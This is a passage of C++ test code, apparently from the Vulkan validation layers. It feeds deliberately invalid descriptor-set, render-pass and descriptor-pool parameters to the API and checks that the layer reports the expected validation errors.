    VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo();
    VkSampler sampler;
    err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler);
    ASSERT_VK_SUCCESS(err);

    // This is the wrong type, but out of bounds will be flagged first
    descriptor_set.WriteDescriptorImageInfo(2, VK_NULL_HANDLE, sampler, VK_DESCRIPTOR_TYPE_SAMPLER);
    descriptor_set.UpdateDescriptorSets();
    m_errorMonitor->VerifyFound();

    vk::DestroySampler(m_device->device(), sampler, NULL);
}

TEST_F(VkLayerTest, DSUpdateEmptyBinding) {
    // Create layout w/ empty binding and attempt to update it
    VkResult err;

    ASSERT_NO_FATAL_FAILURE(Init());

    OneOffDescriptorSet descriptor_set(m_device, {
                                                     {0, VK_DESCRIPTOR_TYPE_SAMPLER, 0 /* !! */, VK_SHADER_STAGE_ALL, nullptr},
                                                 });

    VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo();
    VkSampler sampler;
    err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler);
    ASSERT_VK_SUCCESS(err);

    // descriptor_write.descriptorCount = 1, Lie here to avoid parameter_validation error
    // This is the wrong type, but empty binding error will be flagged first
    descriptor_set.WriteDescriptorImageInfo(0, VK_NULL_HANDLE, sampler, VK_DESCRIPTOR_TYPE_SAMPLER);

    m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstBinding-00316");
    descriptor_set.UpdateDescriptorSets();
    m_errorMonitor->VerifyFound();

    vk::DestroySampler(m_device->device(), sampler, NULL);
}

TEST_F(VkLayerTest, InvalidDSUpdateStruct) {
    // Call UpdateDS w/ struct type other than the valid VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET type
    VkResult err;

    m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, ".sType must be VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET");

    ASSERT_NO_FATAL_FAILURE(Init());

    OneOffDescriptorSet descriptor_set(m_device, {
                                                     {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr},
                                                 });

    VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo();
    VkSampler sampler;
    err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler);
    ASSERT_VK_SUCCESS(err);

    VkDescriptorImageInfo info = {};
    info.sampler = sampler;

    VkWriteDescriptorSet descriptor_write;
    memset(&descriptor_write, 0, sizeof(descriptor_write));
    descriptor_write.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; /* Intentionally broken struct type */
    descriptor_write.dstSet = descriptor_set.set_;
    descriptor_write.descriptorCount = 1;
    // This is the wrong type, but out of bounds will be flagged first
    descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_SAMPLER;
    descriptor_write.pImageInfo = &info;

    vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL);

    m_errorMonitor->VerifyFound();

    vk::DestroySampler(m_device->device(), sampler, NULL);
}

TEST_F(VkLayerTest, SampleDescriptorUpdateError) {
    // Create a single Sampler descriptor and send it an invalid Sampler
    m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-00325");

    ASSERT_NO_FATAL_FAILURE(Init());

    OneOffDescriptorSet descriptor_set(m_device, {
                                                     {0, VK_DESCRIPTOR_TYPE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr},
                                                 });

    VkSampler sampler = CastToHandle<VkSampler, uintptr_t>(0xbaadbeef);  // Sampler with invalid handle

    descriptor_set.WriteDescriptorImageInfo(0, VK_NULL_HANDLE, sampler, VK_DESCRIPTOR_TYPE_SAMPLER);
    descriptor_set.UpdateDescriptorSets();
    m_errorMonitor->VerifyFound();
}

TEST_F(VkLayerTest,
ImageViewDescriptorUpdateError) { // Create a single combined Image/Sampler descriptor and send it an invalid // imageView VkResult err; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-00326"); ASSERT_NO_FATAL_FAILURE(Init()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); VkImageView view = CastToHandle<VkImageView, uintptr_t>(0xbaadbeef); // invalid imageView object descriptor_set.WriteDescriptorImageInfo(0, view, sampler, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); vk::DestroySampler(m_device->device(), sampler, NULL); } TEST_F(VkLayerTest, CopyDescriptorUpdateErrors) { // Create DS w/ layout of 2 types, write update 1 and attempt to copy-update // into the other VkResult err; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " binding #1 with type VK_DESCRIPTOR_TYPE_SAMPLER. Types do not match."); ASSERT_NO_FATAL_FAILURE(Init()); VkSamplerCreateInfo sampler_ci = SafeSaneSamplerCreateInfo(); VkSampler immutable_sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &immutable_sampler); ASSERT_VK_SUCCESS(err); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); OneOffDescriptorSet descriptor_set_2( m_device, { {0, VK_DESCRIPTOR_TYPE_SAMPLER, 1, VK_SHADER_STAGE_ALL, static_cast<VkSampler *>(&immutable_sampler)}, }); VkSampler sampler; err = vk::CreateSampler(m_device->device(), &sampler_ci, NULL, &sampler); ASSERT_VK_SUCCESS(err); // SAMPLER binding from layout above // This write update should succeed descriptor_set.WriteDescriptorImageInfo(1, VK_NULL_HANDLE, sampler, VK_DESCRIPTOR_TYPE_SAMPLER); descriptor_set.UpdateDescriptorSets(); // Now perform a copy update that fails due to type mismatch VkCopyDescriptorSet copy_ds_update; memset(&copy_ds_update, 0, sizeof(VkCopyDescriptorSet)); copy_ds_update.sType = VK_STRUCTURE_TYPE_COPY_DESCRIPTOR_SET; copy_ds_update.srcSet = descriptor_set.set_; copy_ds_update.srcBinding = 1; // Copy from SAMPLER binding copy_ds_update.dstSet = descriptor_set.set_; copy_ds_update.dstBinding = 0; // ERROR : copy to UNIFORM binding copy_ds_update.descriptorCount = 1; // copy 1 descriptor vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyFound(); // Now perform a copy update that fails due to binding out of bounds m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " does not have copy update src binding of 3."); memset(&copy_ds_update, 0, sizeof(VkCopyDescriptorSet)); copy_ds_update.sType = VK_STRUCTURE_TYPE_COPY_DESCRIPTOR_SET; copy_ds_update.srcSet = descriptor_set.set_; copy_ds_update.srcBinding = 3; // ERROR : Invalid binding for matching layout copy_ds_update.dstSet = descriptor_set.set_; copy_ds_update.dstBinding = 0; copy_ds_update.descriptorCount = 1; // Copy 1 descriptor vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyFound(); // Now perform a copy update that fails due to binding out of bounds m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " binding#1 with offset 
index of 1 plus update array offset of 0 and update of 5 " "descriptors oversteps total number of descriptors in set: 2."); memset(&copy_ds_update, 0, sizeof(VkCopyDescriptorSet)); copy_ds_update.sType = VK_STRUCTURE_TYPE_COPY_DESCRIPTOR_SET; copy_ds_update.srcSet = descriptor_set.set_; copy_ds_update.srcBinding = 1; copy_ds_update.dstSet = descriptor_set.set_; copy_ds_update.dstBinding = 0; copy_ds_update.descriptorCount = 5; // ERROR copy 5 descriptors (out of bounds for layout) vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyFound(); // Now perform a copy into an immutable sampler m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkCopyDescriptorSet-dstBinding-02753"); copy_ds_update.srcSet = descriptor_set.set_; copy_ds_update.srcBinding = 1; copy_ds_update.dstSet = descriptor_set_2.set_; copy_ds_update.dstBinding = 0; copy_ds_update.descriptorCount = 1; vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyFound(); vk::DestroySampler(m_device->device(), sampler, NULL); vk::DestroySampler(m_device->device(), immutable_sampler, NULL); } TEST_F(VkLayerTest, DrawWithPipelineIncompatibleWithRenderPass) { TEST_DESCRIPTION( "Hit RenderPass incompatible cases. Initial case is drawing with an active renderpass that's not compatible with the bound " "pipeline state object's creation renderpass"); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); const VkPipelineLayoutObj pipeline_layout(m_device, {&descriptor_set.layout_}); VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, bindStateFragShaderText, VK_SHADER_STAGE_FRAGMENT_BIT, this); // We shouldn't need a fragment shader // but add it to be able to run on more devices // Create a renderpass that will be incompatible with default renderpass VkAttachmentReference color_att = {}; color_att.layout = VK_IMAGE_LAYOUT_GENERAL; VkSubpassDescription subpass = {}; subpass.colorAttachmentCount = 1; subpass.pColorAttachments = &color_att; VkRenderPassCreateInfo rpci = {}; rpci.subpassCount = 1; rpci.pSubpasses = &subpass; rpci.attachmentCount = 1; VkAttachmentDescription attach_desc = {}; attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; // Format incompatible with PSO RP color attach format B8G8R8A8_UNORM attach_desc.format = VK_FORMAT_R8G8B8A8_UNORM; attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; rpci.pAttachments = &attach_desc; rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; VkRenderPass rp; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.AddDefaultColorAttachment(); VkViewport viewport = {0.0f, 0.0f, 64.0f, 64.0f, 0.0f, 1.0f}; m_viewports.push_back(viewport); pipe.SetViewport(m_viewports); VkRect2D rect = {{0, 0}, {64, 64}}; m_scissors.push_back(rect); pipe.SetScissor(m_scissors); pipe.CreateVKPipeline(pipeline_layout.handle(), rp); VkCommandBufferInheritanceInfo cbii = {}; cbii.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_INHERITANCE_INFO; cbii.renderPass = rp; cbii.subpass = 0; VkCommandBufferBeginInfo cbbi = {}; cbbi.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_BEGIN_INFO; cbbi.pInheritanceInfo = &cbii; vk::BeginCommandBuffer(m_commandBuffer->handle(), &cbbi); vk::CmdBeginRenderPass(m_commandBuffer->handle(), &m_renderPassBeginInfo, 
VK_SUBPASS_CONTENTS_INLINE); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdDraw-renderPass-02684"); // Render triangle (the error should trigger on the attempt to draw). m_commandBuffer->Draw(3, 1, 0, 0); // Finalize recording of the command buffer m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); m_errorMonitor->VerifyFound(); vk::DestroyRenderPass(m_device->device(), rp, NULL); } TEST_F(VkLayerTest, Maint1BindingSliceOf3DImage) { TEST_DESCRIPTION( "Attempt to bind a slice of a 3D texture in a descriptor set. This is explicitly disallowed by KHR_maintenance1 to keep " "things simple for drivers."); ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MAINTENANCE1_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_MAINTENANCE1_EXTENSION_NAME); } else { printf("%s %s is not supported; skipping\n", kSkipPrefix, VK_KHR_MAINTENANCE1_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitState()); VkResult err; OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr}, }); VkImageCreateInfo ici = {VK_STRUCTURE_TYPE_IMAGE_CREATE_INFO, nullptr, VK_IMAGE_CREATE_2D_ARRAY_COMPATIBLE_BIT_KHR, VK_IMAGE_TYPE_3D, VK_FORMAT_R8G8B8A8_UNORM, {32, 32, 32}, 1, 1, VK_SAMPLE_COUNT_1_BIT, VK_IMAGE_TILING_OPTIMAL, VK_IMAGE_USAGE_SAMPLED_BIT, VK_SHARING_MODE_EXCLUSIVE, 0, nullptr, VK_IMAGE_LAYOUT_UNDEFINED}; VkImageObj image(m_device); image.init(&ici); ASSERT_TRUE(image.initialized()); VkImageViewCreateInfo ivci = { VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO, nullptr, 0, image.handle(), VK_IMAGE_VIEW_TYPE_2D, VK_FORMAT_R8G8B8A8_UNORM, {VK_COMPONENT_SWIZZLE_IDENTITY, VK_COMPONENT_SWIZZLE_IDENTITY, VK_COMPONENT_SWIZZLE_IDENTITY, VK_COMPONENT_SWIZZLE_IDENTITY}, {VK_IMAGE_ASPECT_COLOR_BIT, 0, 1, 0, 1}, }; VkImageView view; err = vk::CreateImageView(m_device->device(), &ivci, nullptr, &view); ASSERT_VK_SUCCESS(err); // Meat of the test. m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorImageInfo-imageView-00343"); VkDescriptorImageInfo dii = {VK_NULL_HANDLE, view, VK_IMAGE_LAYOUT_GENERAL}; VkWriteDescriptorSet write = {VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET, nullptr, descriptor_set.set_, 0, 0, 1, VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE, &dii, nullptr, nullptr}; vk::UpdateDescriptorSets(m_device->device(), 1, &write, 0, nullptr); m_errorMonitor->VerifyFound(); vk::DestroyImageView(m_device->device(), view, nullptr); } TEST_F(VkLayerTest, UpdateDestroyDescriptorSetLayout) { TEST_DESCRIPTION("Attempt updates to descriptor sets with destroyed descriptor set layouts"); // TODO: Update to match the descriptor set layout specific VUIDs/VALIDATION_ERROR_* when present const auto kWriteDestroyedLayout = "VUID-VkWriteDescriptorSet-dstSet-00320"; const auto kCopyDstDestroyedLayout = "VUID-VkCopyDescriptorSet-dstSet-parameter"; const auto kCopySrcDestroyedLayout = "VUID-VkCopyDescriptorSet-srcSet-parameter"; ASSERT_NO_FATAL_FAILURE(Init()); // Set up the descriptor (resource) and write/copy operations to use. 
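    // A small uniform buffer backs the write update; the copy update then copies that descriptor between the sets created below.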
float data[16] = {}; VkConstantBufferObj buffer(m_device, sizeof(data), data, VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT); ASSERT_TRUE(buffer.initialized()); VkDescriptorBufferInfo info = {}; info.buffer = buffer.handle(); info.range = VK_WHOLE_SIZE; VkWriteDescriptorSet write_descriptor = {}; write_descriptor.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; write_descriptor.dstSet = VK_NULL_HANDLE; // must update this write_descriptor.dstBinding = 0; write_descriptor.descriptorCount = 1; write_descriptor.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; write_descriptor.pBufferInfo = &info; VkCopyDescriptorSet copy_descriptor = {}; copy_descriptor.sType = VK_STRUCTURE_TYPE_COPY_DESCRIPTOR_SET; copy_descriptor.srcSet = VK_NULL_HANDLE; // must update copy_descriptor.srcBinding = 0; copy_descriptor.dstSet = VK_NULL_HANDLE; // must update copy_descriptor.dstBinding = 0; copy_descriptor.descriptorCount = 1; // Create valid and invalid source and destination descriptor sets std::vector<VkDescriptorSetLayoutBinding> one_uniform_buffer = { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }; OneOffDescriptorSet good_dst(m_device, one_uniform_buffer); ASSERT_TRUE(good_dst.Initialized()); OneOffDescriptorSet bad_dst(m_device, one_uniform_buffer); // Must assert before invalidating it below ASSERT_TRUE(bad_dst.Initialized()); bad_dst.layout_ = VkDescriptorSetLayoutObj(); OneOffDescriptorSet good_src(m_device, one_uniform_buffer); ASSERT_TRUE(good_src.Initialized()); // Put valid data in the good and bad sources, simultaneously doing a positive test on write and copy operations m_errorMonitor->ExpectSuccess(); write_descriptor.dstSet = good_src.set_; vk::UpdateDescriptorSets(m_device->device(), 1, &write_descriptor, 0, NULL); m_errorMonitor->VerifyNotFound(); OneOffDescriptorSet bad_src(m_device, one_uniform_buffer); ASSERT_TRUE(bad_src.Initialized()); // to complete our positive testing use copy, where above we used write. copy_descriptor.srcSet = good_src.set_; copy_descriptor.dstSet = bad_src.set_; vk::UpdateDescriptorSets(m_device->device(), 0, nullptr, 1, &copy_descriptor); bad_src.layout_ = VkDescriptorSetLayoutObj(); m_errorMonitor->VerifyNotFound(); // Trigger the three invalid use errors m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, kWriteDestroyedLayout); write_descriptor.dstSet = bad_dst.set_; vk::UpdateDescriptorSets(m_device->device(), 1, &write_descriptor, 0, NULL); m_errorMonitor->VerifyFound(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, kCopyDstDestroyedLayout); copy_descriptor.dstSet = bad_dst.set_; vk::UpdateDescriptorSets(m_device->device(), 0, nullptr, 1, &copy_descriptor); m_errorMonitor->VerifyFound(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, kCopySrcDestroyedLayout); copy_descriptor.srcSet = bad_src.set_; copy_descriptor.dstSet = good_dst.set_; vk::UpdateDescriptorSets(m_device->device(), 0, nullptr, 1, &copy_descriptor); m_errorMonitor->VerifyFound(); } TEST_F(VkLayerTest, FramebufferIncompatible) { TEST_DESCRIPTION( "Bind a secondary command buffer with a framebuffer that does not match the framebuffer for the active renderpass."); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // A renderpass with one color attachment. 
VkAttachmentDescription attachment = {0, VK_FORMAT_B8G8R8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_STORE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}; VkAttachmentReference att_ref = {0, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}; VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 1, &att_ref, nullptr, nullptr, 0, nullptr}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 1, &attachment, 1, &subpass, 0, nullptr}; VkRenderPass rp; VkResult err = vk::CreateRenderPass(m_device->device(), &rpci, nullptr, &rp); ASSERT_VK_SUCCESS(err); // A compatible framebuffer. VkImageObj image(m_device); image.Init(32, 32, 1, VK_FORMAT_B8G8R8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image.initialized()); VkImageViewCreateInfo ivci = { VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO, nullptr, 0, image.handle(), VK_IMAGE_VIEW_TYPE_2D, VK_FORMAT_B8G8R8A8_UNORM, {VK_COMPONENT_SWIZZLE_IDENTITY, VK_COMPONENT_SWIZZLE_IDENTITY, VK_COMPONENT_SWIZZLE_IDENTITY, VK_COMPONENT_SWIZZLE_IDENTITY}, {VK_IMAGE_ASPECT_COLOR_BIT, 0, 1, 0, 1}, }; VkImageView view; err = vk::CreateImageView(m_device->device(), &ivci, nullptr, &view); ASSERT_VK_SUCCESS(err); VkFramebufferCreateInfo fci = {VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO, nullptr, 0, rp, 1, &view, 32, 32, 1}; VkFramebuffer fb; err = vk::CreateFramebuffer(m_device->device(), &fci, nullptr, &fb); ASSERT_VK_SUCCESS(err); VkCommandBufferAllocateInfo cbai = {}; cbai.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_ALLOCATE_INFO; cbai.commandPool = m_commandPool->handle(); cbai.level = VK_COMMAND_BUFFER_LEVEL_SECONDARY; cbai.commandBufferCount = 1; VkCommandBuffer sec_cb; err = vk::AllocateCommandBuffers(m_device->device(), &cbai, &sec_cb); ASSERT_VK_SUCCESS(err); VkCommandBufferBeginInfo cbbi = {}; VkCommandBufferInheritanceInfo cbii = {}; cbii.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_INHERITANCE_INFO; cbii.renderPass = renderPass(); cbii.framebuffer = fb; cbbi.sType = VK_STRUCTURE_TYPE_COMMAND_BUFFER_BEGIN_INFO; cbbi.pNext = NULL; cbbi.flags = VK_COMMAND_BUFFER_USAGE_ONE_TIME_SUBMIT_BIT | VK_COMMAND_BUFFER_USAGE_RENDER_PASS_CONTINUE_BIT; cbbi.pInheritanceInfo = &cbii; vk::BeginCommandBuffer(sec_cb, &cbbi); vk::EndCommandBuffer(sec_cb); VkCommandBufferBeginInfo cbbi2 = {VK_STRUCTURE_TYPE_COMMAND_BUFFER_BEGIN_INFO, nullptr, 0, nullptr}; vk::BeginCommandBuffer(m_commandBuffer->handle(), &cbbi2); vk::CmdBeginRenderPass(m_commandBuffer->handle(), &m_renderPassBeginInfo, VK_SUBPASS_CONTENTS_SECONDARY_COMMAND_BUFFERS); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdExecuteCommands-pCommandBuffers-00099"); vk::CmdExecuteCommands(m_commandBuffer->handle(), 1, &sec_cb); m_errorMonitor->VerifyFound(); // Cleanup vk::CmdEndRenderPass(m_commandBuffer->handle()); vk::EndCommandBuffer(m_commandBuffer->handle()); vk::DestroyImageView(m_device->device(), view, NULL); vk::DestroyRenderPass(m_device->device(), rp, NULL); vk::DestroyFramebuffer(m_device->device(), fb, NULL); } TEST_F(VkLayerTest, RenderPassMissingAttachment) { TEST_DESCRIPTION("Begin render pass with missing framebuffer attachment"); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // Create a renderPass with a single color attachment VkAttachmentReference attach = {}; attach.layout = VK_IMAGE_LAYOUT_GENERAL; VkSubpassDescription subpass = 
{};
    subpass.pColorAttachments = &attach;

    VkRenderPassCreateInfo rpci = {};
    rpci.subpassCount = 1;
    rpci.pSubpasses = &subpass;
    rpci.attachmentCount = 1;

    VkAttachmentDescription attach_desc = {};
    attach_desc.format = VK_FORMAT_B8G8R8A8_UNORM;
    attach_desc.samples = VK_SAMPLE_COUNT_1_BIT;
    attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL;
    rpci.pAttachments = &attach_desc;
    rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO;

    VkRenderPass rp;
    VkResult err = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp);
    ASSERT_VK_SUCCESS(err);

    auto createView = lvl_init_struct<VkImageViewCreateInfo>();
    createView.image = m_renderTargets[0]->handle();
    createView.viewType = VK_IMAGE_VIEW_TYPE_2D;
    createView.format = VK_FORMAT_B8G8R8A8_UNORM;
    createView.components.r = VK_COMPONENT_SWIZZLE_R;
    createView.components.g = VK_COMPONENT_SWIZZLE_G;
    createView.components.b = VK_COMPONENT_SWIZZLE_B;
    createView.components.a = VK_COMPONENT_SWIZZLE_A;
    createView.subresourceRange = {VK_IMAGE_ASPECT_COLOR_BIT, 0, 1, 0, 1};
    createView.flags = 0;
    VkImageView iv;
    vk::CreateImageView(m_device->handle(), &createView, nullptr, &iv);

    auto fb_info = lvl_init_struct<VkFramebufferCreateInfo>();
    fb_info.renderPass = rp;
    fb_info.attachmentCount = 1;
    fb_info.pAttachments = &iv;
    fb_info.width = 100;
    fb_info.height = 100;
    fb_info.layers = 1;

    // Create the framebuffer then destroy the view it uses.
    VkFramebuffer fb;
    err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb);
    vk::DestroyImageView(device(), iv, NULL);
    ASSERT_VK_SUCCESS(err);

    m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkRenderPassBeginInfo-framebuffer-parameter");

    auto rpbi = lvl_init_struct<VkRenderPassBeginInfo>();
    rpbi.renderPass = rp;
    rpbi.framebuffer = fb;
    rpbi.renderArea = {{0, 0}, {32, 32}};

    m_commandBuffer->begin();
    vk::CmdBeginRenderPass(m_commandBuffer->handle(), &rpbi, VK_SUBPASS_CONTENTS_INLINE);
    // Don't call vk::CmdEndRenderPass, as the begin has been "skipped" based on the error condition
    m_errorMonitor->VerifyFound();
    m_commandBuffer->end();

    vk::DestroyFramebuffer(m_device->device(), fb, NULL);
    vk::DestroyRenderPass(m_device->device(), rp, NULL);
}

TEST_F(VkLayerTest, AttachmentDescriptionUndefinedFormat) {
    TEST_DESCRIPTION("Create a render pass with an attachment description format set to VK_FORMAT_UNDEFINED");

    ASSERT_NO_FATAL_FAILURE(Init());
    ASSERT_NO_FATAL_FAILURE(InitRenderTarget());

    m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_WARNING_BIT_EXT, "format is VK_FORMAT_UNDEFINED");

    VkAttachmentReference color_attach = {};
    color_attach.layout = VK_IMAGE_LAYOUT_GENERAL;
    color_attach.attachment = 0;
    VkSubpassDescription subpass = {};
    subpass.colorAttachmentCount = 1;
    subpass.pColorAttachments = &color_attach;

    VkRenderPassCreateInfo rpci = {};
    rpci.subpassCount = 1;
    rpci.pSubpasses = &subpass;
    rpci.attachmentCount = 1;
    VkAttachmentDescription attach_desc = {};
    attach_desc.format = VK_FORMAT_UNDEFINED;
    attach_desc.samples = VK_SAMPLE_COUNT_1_BIT;
    attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL;
    rpci.pAttachments = &attach_desc;
    rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO;
    VkRenderPass rp;
    VkResult result = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp);

    m_errorMonitor->VerifyFound();

    if (result == VK_SUCCESS) {
        vk::DestroyRenderPass(m_device->device(), rp, NULL);
    }
}

TEST_F(VkLayerTest, InvalidCreateDescriptorPool) {
    TEST_DESCRIPTION("Attempt to create descriptor pool with invalid parameters");

    ASSERT_NO_FATAL_FAILURE(Init());

    const uint32_t default_descriptor_count = 1;
    const
VkDescriptorPoolSize dp_size_template{VK_DESCRIPTOR_TYPE_SAMPLER, default_descriptor_count}; const VkDescriptorPoolCreateInfo dp_ci_template{VK_STRUCTURE_TYPE_DESCRIPTOR_POOL_CREATE_INFO, nullptr, // pNext 0, // flags 1, // maxSets 1, // poolSizeCount &dp_size_template}; // try maxSets = 0 { VkDescriptorPoolCreateInfo invalid_dp_ci = dp_ci_template; invalid_dp_ci.maxSets = 0; // invalid maxSets value m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorPoolCreateInfo-maxSets-00301"); { VkDescriptorPool pool; vk::CreateDescriptorPool(m_device->device(), &invalid_dp_ci, nullptr, &pool); } m_errorMonitor->VerifyFound(); } // try descriptorCount = 0 { VkDescriptorPoolSize invalid_dp_size = dp_size_template; invalid_dp_size.descriptorCount = 0; // invalid descriptorCount value VkDescriptorPoolCreateInfo dp_ci = dp_ci_template; dp_ci.pPoolSizes = &invalid_dp_size; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorPoolSize-descriptorCount-00302"); { VkDescriptorPool pool; vk::CreateDescriptorPool(m_device->device(), &dp_ci, nullptr, &pool); } m_errorMonitor->VerifyFound(); } } TEST_F(VkLayerTest, DuplicateDescriptorBinding) { TEST_DESCRIPTION("Create a descriptor set layout with a duplicate binding number."); ASSERT_NO_FATAL_FAILURE(Init()); // Create layout where two binding #s are "1" static const uint32_t NUM_BINDINGS = 3; VkDescriptorSetLayoutBinding dsl_binding[NUM_BINDINGS] = {}; dsl_binding[0].binding = 1; dsl_binding[0].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_binding[0].descriptorCount = 1; dsl_binding[0].stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT; dsl_binding[0].pImmutableSamplers = NULL; dsl_binding[1].binding 